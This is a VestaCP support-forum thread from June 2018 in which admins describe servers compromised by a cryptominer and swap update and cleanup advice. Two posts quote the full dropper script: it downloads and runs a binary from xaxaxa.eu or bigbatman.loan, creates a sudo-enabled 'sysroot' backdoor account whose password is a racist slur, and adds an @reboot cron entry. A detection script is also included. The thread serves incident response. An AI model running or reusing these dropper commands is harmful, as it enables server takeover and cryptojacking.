Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 7:24 am
by ScIT
Spheerys wrote: Tue Jun 26, 2018 7:21 am A new line was added to /etc/passwd:

sysroot:x:1007:1008::/home/sysroot:/bin/sh
And /etc/group:

sysroot:x:1008:
and /etc/gshadow:

sysroot:!::
and /etc/subuid: and /etc/shadow:

sysroot:$6$A7jC1gBu$3kMVa4OoMDiyw8zLX7Y9X7kmyUNH9cbR6x6tSeNATJ.NlXEBE/DdFnKFCryHJAxHFOIFkUQmyKodtHLJH.QF.:17708:0:99999:7:::
/etc/sudoers (sic!!):

sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
As the thread owner noted in his first post, the following script was executed:

if pgrep -x "gcc" > /dev/null
then
    echo "Running"
else
    cd;
    pkill -f xmrig;
    wget -O /tmp/gcc http://xaxaxa.eu/gcc;
    chmod +x gcc;
    wget -O /tmp/config_1.json http://xaxaxa.eu/config_1.json;
    /tmp/gcc -c /tmp/config_1.json;
    echo "fucktheniggers" | sudo -S useradd sysroot;
    echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot:fucktheniggers" | chpasswd';
    echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot ALL=(ALL) ALL" >> /etc/sudoers';
    (crontab -l ; echo "@reboot /tmp/gcc -c /tmp/config_1.json")| crontab -;
    /usr/local/vesta/bin/v-update-sys-vesta-all;
fi
This would explain your created lines.
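As an added example (not code from the thread, and not part of VestaCP), the following read-only triage script checks a host for exactly the artifacts listed in this post: the sysroot account in passwd, the repeated "sysroot ALL=(ALL) ALL" sudoers grant, the "@reboot /tmp/gcc" crontab entry, and a process named gcc started from /tmp with a JSON config. The function names, the expected directory layout, and the sample files it builds are my own assumptions; the sample contents are constructed from the lines quoted above, not captured from a real server.

```shell
#!/bin/sh
# Added triage helper, not code from the thread or from VestaCP. Every check
# reads text from stdin so it can be pointed at copies of the files (or the
# live files) without ever modifying them.

# Print how many sudoers lines grant the sysroot account full rights.
# The thread shows this line appended once per run of the dropper script.
count_sysroot_sudo_grants() {
    grep -cE '^[[:space:]]*sysroot[[:space:]]+ALL=\(ALL\)[[:space:]]+ALL' || true
}

# Print the UID of the sysroot account from passwd-format input (nothing if absent).
sysroot_uid() {
    awk -F: '$1 == "sysroot" { print $3 }'
}

# Print @reboot crontab entries that relaunch the dropped binary or its config.
miner_reboot_entries() {
    grep -E '^@reboot[[:space:]].*(/tmp/gcc|config_1\.json)' || true
}

# From "ps -eo pid,args" output, print PIDs of /tmp/gcc run with "-c <config>";
# a real compiler is never started from /tmp with a JSON file as its input.
fake_gcc_pids() {
    awk '$2 == "/tmp/gcc" && $3 == "-c" { print $1 }'
}

# Run all checks against copies of passwd, sudoers, crontab and ps output
# stored in directory $1 and print one "FINDING:" line per artifact found.
triage_dir() {
    dir=$1
    uid=$(sysroot_uid < "$dir/passwd")
    if [ -n "$uid" ]; then
        echo "FINDING: sysroot account present in passwd (uid $uid)"
    fi
    grants=$(count_sysroot_sudo_grants < "$dir/sudoers")
    if [ "$grants" -gt 0 ]; then
        echo "FINDING: $grants sudoers line(s) granting sysroot ALL=(ALL) ALL"
    fi
    entries=$(miner_reboot_entries < "$dir/crontab")
    if [ -n "$entries" ]; then
        echo "FINDING: crontab relaunches miner at boot: $entries"
    fi
    pids=$(fake_gcc_pids < "$dir/ps.txt" | tr '\n' ' ')
    if [ -n "$pids" ]; then
        echo "FINDING: /tmp/gcc running with miner config, pid(s): $pids"
    fi
    return 0
}

# Constructed sample data modelled on the lines quoted in this thread
# (assumption: a compromised host would look like this; not a real capture).
SAMPLE_DIR=$(mktemp -d)
cat > "$SAMPLE_DIR/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
admin:x:1000:1000::/home/admin:/bin/bash
sysroot:x:1007:1008::/home/sysroot:/bin/sh
EOF
cat > "$SAMPLE_DIR/sudoers" <<'EOF'
root ALL=(ALL:ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
EOF
cat > "$SAMPLE_DIR/crontab" <<'EOF'
15 2 * * * /usr/local/bin/nightly-backup.sh
@reboot /tmp/gcc -c /tmp/config_1.json
EOF
cat > "$SAMPLE_DIR/ps.txt" <<'EOF'
    PID COMMAND
      1 /sbin/init
   2314 /tmp/gcc -c /tmp/config_1.json
   2400 gcc -c main.c -o main.o
EOF

# Usage: on a suspect host, copy /etc/passwd and /etc/sudoers, save
# "crontab -l" as crontab and "ps -eo pid,args" as ps.txt into one directory,
# then run triage_dir on it. Here it runs on the constructed sample.
triage_dir "$SAMPLE_DIR"
```

For a fleet like the one described later in the thread, the same four files can be collected from each host over scp and the script run centrally on each directory. No findings does not prove a host is clean (the dropper is trivially renamed), so this only triages; ScIT's advice to reinstall rather than trust a compromised server still applies.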

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 7:25 am
by aximus
I've updated the system without errors. But still I'm on version .20. /usr/local/vesta/bin doesn't seem to update anything for me, nor does apt-get update vesta. Any ideas?

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 7:29 am
by ScIT
aximus wrote: Tue Jun 26, 2018 7:25 am I've updated the system without errors. But still I'm on version .20. /usr/local/vesta/bin doesn't seem to update anything for me, nor does apt-get update vesta. Any ideas?
Did you try to upgrade like I wrote? -> viewtopic.php?f=10&t=17183#p71558

If yes, please share the output of ./v-list-sys-vesta-updates.

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 7:31 am
by Spheerys
ScIT wrote: Tue Jun 26, 2018 7:29 am If yes, please share the output of ./v-list-sys-vesta-updates.
In my case:

PKG          VER    REL  ARCH   UPDT  DATE
---          ---    ---  ----   ----  ----
vesta        0.9.8  22   amd64  yes   2018-06-26
vesta-php    0.9.8  21   amd64  yes   2018-05-25
vesta-nginx  0.9.8  21   amd64  yes   2018-05-25

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 7:33 am
by ScIT
Spheerys wrote: Tue Jun 26, 2018 7:31 am
ScIT wrote: Tue Jun 26, 2018 7:29 am If yes, please share the output of ./v-list-sys-vesta-updates.
In my case:

PKG          VER    REL  ARCH   UPDT  DATE
---          ---    ---  ----   ----  ----
vesta        0.9.8  22   amd64  yes   2018-06-26
vesta-php    0.9.8  21   amd64  yes   2018-05-25
vesta-nginx  0.9.8  21   amd64  yes   2018-05-25
You're up to date, good so far. Now you need to clean your server. My point of view: do not trust an infected server anymore. Better install a new one and migrate the users there.

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 7:34 am
by Spheerys
Yes, you are right.
Thanks!

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 7:57 am
by pksh71
Dear team,

We have around 120+ servers running in various data centers across the world. Out of these, 110 servers have VestaCP installed. All 110 servers with VestaCP installed are hacked for CPU cryptocurrency mining by some unknown hacker.

The hacker installed xmrig mining software on our servers.

Some servers also have a script called 'gcc' installed.
How can we get rid of this issue?

Regards

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 8:07 am
by jonny1960
I was also hacked tonight by a mining virus:
if pgrep -x "gcc" > /dev/null
then
echo "Running"
else
cd;
pkill -f xmrig;
rm -rf /tmp/gcc;
rm -rf /tmp/config_1.json;
wget -O /tmp/gcc http://bigbatman.loan/gcc;
chmod 777 /tmp/gcc;
wget -O /tmp/config_1.json http://bigbatman.loan/config_1.json;
/tmp/gcc -c /tmp/config_1.json;
echo "fucktheniggers" | sudo -S useradd sysroot;
echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot:fucktheniggers" | chpasswd';
echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot ALL=(ALL) ALL" >> /etc/sudoers';
(crontab -l ; echo "@reboot /tmp/gcc -c /tmp/config_1.json")| crontab -;
/usr/local/vesta/bin/v-update-sys-vesta-all;
fi

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 8:11 am
by aximus
ScIT wrote: Tue Jun 26, 2018 7:29 am
Did you try to upgrade like I wrote? -> viewtopic.php?f=10&t=17183#p71558

If yes, please share the output of ./v-list-sys-vesta-updates.
I did exactly as you wrote.

PKG          VER    REL  ARCH   UPDT  DATE
---          ---    ---  ----   ----  ----
vesta        0.9.8  20   amd64  no    2018-04-09
vesta-php    0.9.8  19   amd64  no    2018-01-23
vesta-nginx  0.9.8  20   amd64  no    2018-04-09
I don't mean to hijack the topic. But if I'm not receiving updates then of course my server will be targeted.

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 8:12 am
by ScIT
pksh71 wrote: Tue Jun 26, 2018 7:57 am Dear team,

We have around 120+ servers running in various data centers across the world. Out of these, 110 servers have VestaCP installed. All 110 servers with VestaCP installed are hacked for CPU cryptocurrency mining by some unknown hacker.

The hacker installed xmrig mining software on our servers.

Some servers also have a script called 'gcc' installed.
How can we get rid of this issue?

Regards
1. Update to the current patch level (0.9.8-22); this will fix the security issue but does .
2. From my point of view: don't trust infected servers, so reinstall them. If you don't want to reinstall, try to clean the system.